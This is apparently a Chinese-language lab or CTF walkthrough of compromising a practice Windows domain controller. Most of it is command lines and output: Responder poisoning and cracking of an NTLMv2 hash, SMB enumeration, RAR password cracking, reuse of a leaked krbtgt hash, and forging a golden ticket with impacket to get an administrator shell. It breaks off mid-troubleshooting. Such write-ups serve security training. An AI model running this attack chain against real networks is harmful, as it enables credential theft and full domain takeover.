\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ping $IP \nPING 192.168.10.101 (192.168.10.101) 56(84) bytes of data.\n64 bytes from 192.168.10.101: icmp_seq=1 ttl=128 time=2.12 ms\n64 bytes from 192.168.10.101: icmp_seq=2 ttl=128 time=0.752 ms\n64 bytes from 192.168.10.101: icmp_seq=3 ttl=128 time=0.824 ms\n64 bytes from 192.168.10.101: icmp_seq=4 ttl=128 time=0.747 ms\n^C\n--- 192.168.10.101 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3043ms\nrtt min\/avg\/max\/mdev = 0.747\/1.109\/2.115\/0.581 ms<\/code><\/pre>\n\u4f46\u662f\u6ca1\u5f02\u5e38\u3002\u3002\u3002\u3002<\/p>\n
web\u5229\u7528nbns\u52ab\u6301NTLM hash<\/h3>\n
\u7528\u7528\u6237\u540d\u548c\u5bc6\u7801admin:nimda<\/code>\u6253\u5f00\u4e4b\u524d\u7684web\u9875\u9762\uff0c\u53d1\u73b0\u4e00\u4e2a\uff1a<\/p>\n<\/div><\/p>\n\nNetwork Share Heartbeat (\u7f51\u7edc\u5171\u4eab\u5fc3\u8df3) \u662f\u4e00\u79cd\u7528\u4e8e\u76d1\u63a7\u7f51\u7edc\u5171\u4eab\u8d44\u6e90\uff0c\u7279\u522b\u662f\u96c6\u7fa4\u73af\u5883\uff08\u5982Oracle RAC\uff09\u4e2d\u8282\u70b9\u95f4\u901a\u4fe1\u72b6\u6001\u7684\u673a\u5236\u3002\u5b83\u901a\u8fc7\u5468\u671f\u6027\u5730\u53d1\u9001\u548c\u63a5\u6536\u5fc3\u8df3\u5305\u6765\u786e\u8ba4\u8282\u70b9\u662f\u5426\u5904\u4e8e\u6d3b\u52a8\u72b6\u6001\u3002\ufeff<\/p>\n<\/blockquote>\n
\u5c1d\u8bd5\u8fdb\u884c\u76d1\u542c\u83b7\u53d6 NTLMv2hash<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u53e6\u4e00\u8fb9\u4f2a\u9020\u76d1\u542c\u5230\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo responder -I eth0 -v \n[sudo] password for kali: \n __\n .----.-----.-----.-----.-----.-----.--| |.-----.----.\n | _| -__|__ --| _ | _ | | _ || -__| _|\n |__| |_____|_____| __|_____|__|__|_____||_____|__|\n |__|\n\n NBT-NS, LLMNR & MDNS Responder 3.1.6.0\n\n To support this project:\n Github -> https:\/\/github.com\/sponsors\/lgandx\n Paypal -> https:\/\/paypal.me\/PythonResponder\n\n Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n To kill this script hit CTRL-C\n\n[+] Poisoners:\n LLMNR [ON]\n NBT-NS [ON]\n MDNS [ON]\n DNS [ON]\n DHCP [OFF]\n\n[+] Servers:\n HTTP server [ON]\n HTTPS server [ON]\n WPAD proxy [OFF]\n Auth proxy [OFF]\n SMB server [ON]\n Kerberos server [ON]\n SQL server [ON]\n FTP server [ON]\n IMAP server [ON]\n POP3 server [ON]\n SMTP server [ON]\n DNS server [ON]\n LDAP server [ON]\n MQTT server [ON]\n RDP server [ON]\n DCE-RPC server [ON]\n WinRM server [ON]\n SNMP server [ON]\n\n[+] HTTP Options:\n Always serving EXE [OFF]\n Serving EXE [OFF]\n Serving HTML [OFF]\n Upstream Proxy [OFF]\n\n[+] Poisoning Options:\n Analyze Mode [OFF]\n Force WPAD auth [OFF]\n Force Basic Auth [OFF]\n Force LM downgrade [OFF]\n Force ESS downgrade [OFF]\n\n[+] Generic Options:\n Responder NIC [eth0]\n Responder IP [192.168.10.102]\n Responder IPv6 [fd00:4c10:d50a:f900::1003]\n Challenge set [random]\n Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']\n Don't Respond To MDNS TLD ['_DOSVC']\n TTL for poisoned response [default]\n\n[+] Current Session Variables:\n Responder Machine Name [WIN-V59O5XD9V4P]\n Responder Domain Name [HEB4.LOCAL]\n Responder DCE-RPC Port [49647]\n\n[+] Listening for events...\n\n[SMB] NTLMv2-SSP Client : 192.168.10.101\n[SMB] NTLMv2-SSP Username : soupedecode\\websvc\n[SMB] NTLMv2-SSP Hash : websvc::soupedecode:27a657cc9b71fd69:5EC03D3DEAC5B45DCD4D9C5244B1B7EA:0101000000000000809FD74414DCDB017CC76FE000708FD30000000002000800480045004200340001001E00570049004E002D005600350039004F00350058004400390056003400500004003400570049004E002D005600350039004F0035005800440039005600340050002E0048004500420034002E004C004F00430041004C000300140048004500420034002E004C004F00430041004C000500140048004500420034002E004C004F00430041004C0007000800809FD74414DCDB010600040002000000080030003000000000000000000000000040000005B4315A789213EB0FAF2A77B432A0904E738F56279101A440BC0D08ED02CFE50A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310030002E003100300032000000000000000000<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C\/R [MD4 HMAC-MD5 32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\njordan23 (websvc) \n1g 0:00:00:00 DONE (2025-06-13 03:37) 6.250g\/s 6400p\/s 6400c\/s 6400C\/s 123456..bethany\nUse the "--show --format=netntlmv2" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u83b7\u5f97\u4e86\u4e00\u4e2a\u65b0\u51ed\u8bc1websvc:jordan23<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\nSMB\u670d\u52a1\u63a2\u6d4b<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p jordan23\nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\websvc:jordan23 STATUS_PASSWORD_EXPIRED <\/code><\/pre>\n\u53d1\u73b0\u51ed\u8bc1\u8fc7\u671f\u4e86\uff0c\u662f\u4e2abug\uff0c\u8fd9\u548c\u524d\u9762\u5904\u7406\u529e\u6cd5\u4e00\u6837\u7684\uff0c\u8fdb\u884c\u4fee\u6539\u5bc6\u7801\u5c31\u884c\u3002<\/p>\n
\n- \n
\u53f3\u952ectrl<\/code>+delete<\/code>\u89e3\u9501<\/p>\n<\/li>\n- \n
esc<\/code>\u5207\u6362\u81f3\u9009\u7528\u6237\u754c\u9762 \u00d74<\/p>\n<\/li>\n- \n
Other users<\/p>\n<\/li>\n
- \n
Local or domain account password\uff08\u5361\u4f4f\u5c31\u6309\u4e0b\u4e0a\u4e0b\u952e\uff09<\/p>\n<\/li>\n
- \n
\u5bc6\u7801\u767b\u5f55\u754c\u9762<\/p>\n<\/li>\n
- \n
\u663e\u793a\u5bc6\u7801\u8fc7\u671f\u9700\u8981\u4fee\u6539<\/p>\n<\/li>\n
- \n
\u4fee\u6539\u5bc6\u7801<\/p>\n<\/li>\n
- \n
enter\u5373\u53ef<\/p>\n<\/li>\n<\/ul>\n
\u7136\u540e\u53d1\u73b0\u4fee\u6539\u6210\u529f\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u websvc -p hgbepass \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.101:445 Name: soupedecode.local Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ NO ACCESS Remote Admin\n C READ ONLY\n C$ NO ACCESS Default share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p hgbepass\nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [+] SOUPEDECODE.LOCAL\\websvc:hgbepass<\/code><\/pre>\n\u7136\u540e\u5c31\u83b7\u53d6\u4e86user.txt<\/code>\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U "websvc" \/\/$IP\/C \nPassword for [WORKGROUP\\websvc]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n $WinREAgent DH 0 Sat Jun 15 15:19:51 2024\n Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024\n DumpStack.log.tmp AHS 12288 Fri Jun 13 18:28:35 2025\n pagefile.sys AHS 1476395008 Fri Jun 13 18:28:35 2025\n PerfLogs D 0 Sat May 8 04:15:05 2021\n Program Files DR 0 Sat Jun 15 13:54:31 2024\n Program Files (x86) D 0 Sat May 8 05:34:13 2021\n ProgramData DHn 0 Tue Nov 5 16:44:31 2024\n Recovery DHSn 0 Sat Jun 15 22:51:08 2024\n System Volume Information DHS 0 Sat Jun 15 15:02:21 2024\n Users DR 0 Wed Nov 6 20:55:53 2024\n Windows D 0 Thu Nov 7 17:32:13 2024\n xampp D 0 Tue Nov 5 17:56:28 2024\n\n 12942591 blocks of size 4096. 10496839 blocks available\nsmb: \\> cd users\nsmb: \\users\\> ls\n . DR 0 Wed Nov 6 20:55:53 2024\n .. DHS 0 Tue Nov 5 18:30:29 2024\n Administrator D 0 Sat Jun 15 15:56:40 2024\n All Users DHSrn 0 Sat May 8 04:26:16 2021\n Default DHR 0 Sat Jun 15 22:51:08 2024\n Default User DHSrn 0 Sat May 8 04:26:16 2021\n desktop.ini AHS 174 Sat May 8 04:14:03 2021\n fjudy998 D 0 Wed Nov 6 20:55:33 2024\n ojake987 D 0 Wed Nov 6 20:55:16 2024\n Public DR 0 Sat Jun 15 13:54:32 2024\n rtina979 D 0 Wed Nov 6 20:54:39 2024\n websvc D 0 Wed Nov 6 20:44:11 2024\n xursula991 D 0 Wed Nov 6 20:55:28 2024\n\n 12942591 blocks of size 4096. 10487505 blocks available\nsmb: \\users\\> cd websvc\nsmb: \\users\\websvc\\> cd desktop\nsmb: \\users\\websvc\\desktop\\> ls\n . DR 0 Thu Nov 7 14:08:21 2024\n .. D 0 Wed Nov 6 20:44:11 2024\n user.txt A 32 Thu Nov 7 05:07:55 2024\n\n 12942591 blocks of size 4096. 10528272 blocks available\nsmb: \\users\\websvc\\desktop\\> get user.txt\ngetting file \\users\\websvc\\desktop\\user.txt of size 32 as user.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\users\\websvc\\desktop\\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat user.txt \n709e449a996a85aa7deaf18c79515d6a<\/code><\/pre>\n\u63d0\u6743<\/h2>\nsmb\u679a\u4e3e<\/h3>\n
\u53d1\u73b0\u4e86\u597d\u591a\u7528\u6237\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u641c\u96c6\uff1a<\/p>\n
fjudy998\nojake987\nrtina979\nxursula991<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p 'hgbepass' --users > log\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "fjudy998" \nSMB 192.168.10.101 445 DC01 fjudy998 2024-06-15 20:05:26 0 Music lover and aspiring guitarist \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "ojake987" \nSMB 192.168.10.101 445 DC01 ojake987 2024-06-15 20:05:25 0 Tech geek and gadget collector \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "rtina979" \nSMB 192.168.10.101 445 DC01 rtina979 2024-11-07 01:53:17 0 Default Password Z~l3JhcV#7Q-1#M \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "xursula991" \nSMB 192.168.10.101 445 DC01 xursula991 2024-06-15 20:05:26 0 Yoga practitioner and meditation lover<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u65b0\u51ed\u8bc1\uff1artina979:Z~l3JhcV#7Q-1#M<\/code>\uff0c\u770b\u770b\u76ee\u5f55\u4e0b\u6709\u4e9b\u5565\uff0c\u53d1\u73b0\u51ed\u8bc1\u8fc7\u671f\u4e86\uff0c\u8fdb\u884c\u4fee\u6539\u5373\u53ef\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p hgbepass \nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [+] SOUPEDECODE.LOCAL\\websvc:hgbepass \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u rtina979 -p hgbepass \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.101:445 Name: soupedecode.local Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ NO ACCESS Remote Admin\n C READ ONLY\n C$ NO ACCESS Default share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections <\/code><\/pre>\n\u7136\u540e\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U "rtina979" \/\/$IP\/C \nPassword for [WORKGROUP\\rtina979]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n $WinREAgent DH 0 Sat Jun 15 15:19:51 2024\n Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024\n DumpStack.log.tmp AHS 12288 Fri Jun 13 18:28:35 2025\n pagefile.sys AHS 1476395008 Fri Jun 13 18:28:35 2025\n PerfLogs D 0 Sat May 8 04:15:05 2021\n Program Files DR 0 Sat Jun 15 13:54:31 2024\n Program Files (x86) D 0 Sat May 8 05:34:13 2021\n ProgramData DHn 0 Tue Nov 5 16:44:31 2024\n Recovery DHSn 0 Sat Jun 15 22:51:08 2024\n System Volume Information DHS 0 Sat Jun 15 15:02:21 2024\n Users DR 0 Wed Nov 6 20:55:53 2024\n Windows D 0 Thu Nov 7 17:32:13 2024\n xampp D 0 Tue Nov 5 17:56:28 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\> cd users\/rtina979\/desktop\nsmb: \\users\\rtina979\\desktop\\> ls\n . DR 0 Sat May 8 04:15:05 2021\n .. D 0 Wed Nov 6 20:54:39 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\desktop\\> cd ..\nsmb: \\users\\rtina979\\> ls\n . D 0 Wed Nov 6 20:54:39 2024\n .. DR 0 Wed Nov 6 20:55:53 2024\n AppData DH 0 Wed Nov 6 20:54:39 2024\n Application Data DHSrn 0 Wed Nov 6 20:54:39 2024\n Cookies DHSrn 0 Wed Nov 6 20:54:39 2024\n Desktop DR 0 Sat May 8 04:15:05 2021\n Documents DR 0 Thu Nov 7 17:35:52 2024\n Downloads DR 0 Sat May 8 04:15:05 2021\n Favorites DR 0 Sat May 8 04:15:05 2021\n Links DR 0 Sat May 8 04:15:05 2021\n Local Settings DHSrn 0 Wed Nov 6 20:54:39 2024\n Music DR 0 Sat May 8 04:15:05 2021\n My Documents DHSrn 0 Wed Nov 6 20:54:39 2024\n NetHood DHSrn 0 Wed Nov 6 20:54:39 2024\n NTUSER.DAT AHn 131072 Fri Jun 13 18:32:06 2025\n ntuser.dat.LOG1 AHS 90112 Wed Nov 6 20:54:39 2024\n ntuser.dat.LOG2 AHS 0 Wed Nov 6 20:54:39 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Wed Nov 6 20:54:45 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Nov 6 20:54:39 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Nov 6 20:54:39 2024\n ntuser.ini AHS 20 Wed Nov 6 20:54:39 2024\n Pictures DR 0 Sat May 8 04:15:05 2021\n Recent DHSrn 0 Wed Nov 6 20:54:39 2024\n Saved Games Dn 0 Sat May 8 04:15:05 2021\n SendTo DHSrn 0 Wed Nov 6 20:54:39 2024\n Start Menu DHSrn 0 Wed Nov 6 20:54:39 2024\n Templates DHSrn 0 Wed Nov 6 20:54:39 2024\n Videos DR 0 Sat May 8 04:15:05 2021\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\> cd documents\nsmb: \\users\\rtina979\\documents\\> ls\n . DR 0 Thu Nov 7 17:35:52 2024\n .. D 0 Wed Nov 6 20:54:39 2024\n My Music DHSrn 0 Wed Nov 6 20:54:39 2024\n My Pictures DHSrn 0 Wed Nov 6 20:54:39 2024\n My Videos DHSrn 0 Wed Nov 6 20:54:39 2024\n Report.rar A 712046 Thu Nov 7 08:35:49 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\documents\\> get Report.rar\ngetting file \\users\\rtina979\\documents\\Report.rar of size 712046 as Report.rar (7726.2 KiloBytes\/sec) (average 7726.2 KiloBytes\/sec)\nsmb: \\users\\rtina979\\documents\\> exit<\/code><\/pre>\n\u538b\u7f29\u5305\u5bc6\u7801\u7834\u89e3<\/h3>\n
\u53d1\u73b0\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u5c1d\u8bd5\u89e3\u538b\uff0c\u4f46\u662f\u53d1\u73b0\u6709\u5bc6\u7801\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nThe specified password is incorrect.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rar2john Report.rar > hash1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash1\nUsing default input encoding: UTF-8\nLoaded 1 password hash (RAR5 [PBKDF2-SHA256 128\/128 SSE2 4x])\nCost 1 (iteration count) is 32768 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nPASSWORD123 (Report.rar) \n1g 0:00:03:48 DONE (2025-06-13 04:29) 0.004368g\/s 224.4p\/s 224.4c\/s 224.4C\/s abby23..MANMAN\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nExtracting from Report.rar\n\nExtracting Pentest Report.htm OK \nExtracting m2-unbound-source-serif-pro.css OK \nExtracting main-branding-base.W9J-2zkF03j8TkriAGn1Tg.12.css OK \nExtracting dart.min.js OK \nExtracting google-analytics_analytics.js OK \nExtracting highlight.min.js OK \nExtracting main-base.bundle.IcW7tD43-xaHoBj2_P6wLQ.12.js OK \nExtracting main-common-async.bundle.SkTeOM8g4JVEInYAgrgW9Q.12.js OK \nExtracting main-notes.bundle.qVLVB-ghGjYQMo6npDHNjw.12.js OK \nExtracting main-posters.bundle.JMIo8YhZ0NhbVObiML4nWQ.12.js OK \nAll OK<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u62a5\u544a\uff1a<\/p>\n
<\/div><\/p>\n\u6cc4\u9732\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n
\nfile_svc:Password123!!<\/code><\/li>\nfile_svc:$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local\/file_svc*$afade2a48795f1f<\/code>\n\n- \u4f3c\u4e4e\u53ef\u4ee5\u7206\u7834\u51fa\u6765<\/li>\n<\/ul>\n<\/li>\n
SMB 192.168.56.121 445 DC01 [+] soupedecode.local\\ybob317:ybob317<\/code><\/li>\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f55cdc40bd8f5814587f7e6b2f85e6f:::<\/code><\/li>\n<\/ul>\n\u524d\u4e09\u4e2a\u4f3c\u4e4e\u90fd\u662f\u9519\u7684\uff0c\u7528\u6237\u6ca1\u89c1\u8fc7\uff0c\u6700\u540e\u4e00\u4e2a\u662f\u5bf9\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec ldap $IP -u krbtgt -H 0f55cdc40bd8f5814587f7e6b2f85e6f\n[*] Initializing LDAP protocol database\nLDAP 192.168.10.101 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)\nLDAP 192.168.10.101 389 DC01 [-] SOUPEDECODE.LOCAL\\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED<\/code><\/pre>\n\n- \u8868\u660e
krbtgt<\/code> \u8d26\u6237\u5728 Active Directory \u4e2d\u88ab\u7981\u7528\uff0c\u4f46\u662f\u5b58\u5728\u7684\u3002<\/li>\n<\/ul>\n\u751f\u6210\u9ec4\u91d1\u7968\u636e<\/h3>\n
\u9996\u5148\u9700\u8981\u751f\u6210DOMAIN<\/code>\u7684SID<\/code><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ impacket-lookupsid websvc:hgbepass@$IP \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Brute forcing SIDs at 192.168.10.101\n[*] StringBinding ncacn_np:192.168.10.101[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n------------------<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u53c2\u8003\u5927\u4f6c\u7684wp\u4e86\uff1a<\/p>\n
\/etc\/krb5.conf<\/h4>\n
\u9700\u8981\u5148\u8bbe\u7f6e\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a\/etc\/krb5.conf<\/code>:<\/p>\n[libdefaults]\n default_realm = SOUPEDECODE.LOCAL\n dns_lookup_kdc = true\n\n[realms]\n SOUPEDECODE.LOCAL = {\n kdc = dc01.soupedecode.local\n admin_server = dc01.soupedecode.local\n }\n[domain_realm]\n soupedecode.local = SOUPEDECODE.LOCAL\n .soupedecode.local = SOUPEDECODE.LOCAL<\/code><\/pre>\n\u6267\u884c\u7279\u5b9a\u811a\u672c<\/h4>\n# sudo apt install ntpsec-ntpdate\nIP=192.168.10.101\nsudo ntpdate -u $IP\nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nKRB5CCNAME=administrator.ccache evil-winrm -i $IP -u administrator -r soupedecode.local<\/code><\/pre>\n\u4f46\u662f\u6267\u884c\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ .\/exp.sh \n2025-06-13 19:57:16.465238 (-0400) +54001.739300 +\/- 0.000713 192.168.10.101 s1 no-leap\nCLOCK: time stepped by 54001.739300\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nWarning: User is not needed for Kerberos auth. Ticket will be used\n\nInfo: Establishing connection to remote endpoint\n\nError: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information\nCannot contact any KDC for realm 'SOUPEDECODE.LOCAL'\n\nError: Exiting with code 1<\/code><\/pre>\n\u5c1d\u8bd5\u6362\u4e00\u4e2akali<\/code>\u518d\u8bd5\u4e00\u4e0b\uff0c\u4f46\u662f\u53d1\u73b0\u4f9d\u7136\u51fa\u73b0\u4e0a\u8ff0\u95ee\u9898\u3002\u3002\u3002\u3002\u7136\u540e\u6309\u7167\u535a\u5ba2\u4e09\u8fdb\u884c\u64cd\u4f5c\u89e3\u51b3\u4e86\u8fd9\u4e00\u95ee\u9898\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101 \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:27:16 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo systemctl stop systemd-timesyncd\nFailed to stop systemd-timesyncd.service: Unit systemd-timesyncd.service not loaded.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ date\nFri Jun 13 05:43:13 AM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo ntpdate -q 192.168.10.101 \n2025-06-13 20:28:41.432572 (-0400) +53096.984937 +\/- 0.000667 192.168.10.101 s1 